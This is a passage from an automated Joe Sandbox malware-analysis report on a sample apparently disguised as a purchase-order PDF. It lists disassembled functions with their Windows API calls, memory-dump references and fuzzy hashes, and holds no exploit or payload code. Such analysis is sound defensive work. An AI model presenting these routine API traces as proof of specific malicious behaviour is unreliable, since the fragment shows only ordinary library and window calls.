                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                            • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                                                                                                                                                                                            • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                                                                                                                                                                                                            Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                                                                                                                                                                                            • gethostbyname.WSOCK32(?), ref: 0046BD78
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 1515696956-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                                                                                                                                                                                                            Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00449828
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 772068139-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6c8e4ef583cbe43a73f2b9829f4c1f84e348ebd42a74c1206e039d61b98ed7cc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c8e4ef583cbe43a73f2b9829f4c1f84e348ebd42a74c1206e039d61b98ed7cc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                                                                                                                                                                                                            Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AllocTask_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: hkG
                                                                                                                                                                                                                                                                                                            • API String ID: 2651040394-3610518997
                                                                                                                                                                                                                                                                                                            • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                                                                                                                                                                                                            Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                                                                                                            • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                                                                                                            • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                                                                                                                                                                                                            Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                                                                                                                                                            • API String ID: 2574300362-58917771
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                                                                            • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                                                                                                                                                                                                            Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                                                                                                                                                            • API String ID: 2574300362-3530519716
                                                                                                                                                                                                                                                                                                            • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                                                                                                                                                                                                            Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                                                                                                                                                            • API String ID: 2574300362-275556492
                                                                                                                                                                                                                                                                                                            • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                                                                                                                                                            • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                                                                                                                                                                                                            Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ccb5d32199bb693159941712c090f8bd24187e8f021d7f69bd072a0570b18ec0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccb5d32199bb693159941712c090f8bd24187e8f021d7f69bd072a0570b18ec0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                                                                                                                                                                                                            Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __flush.LIBCMT ref: 00414630
                                                                                                                                                                                                                                                                                                            • __fileno.LIBCMT ref: 00414650
                                                                                                                                                                                                                                                                                                            • __locking.LIBCMT ref: 00414657
                                                                                                                                                                                                                                                                                                            • __flsbuf.LIBCMT ref: 00414682
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3240763771-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                                                                            • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                                                                                                                                                                                                            Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
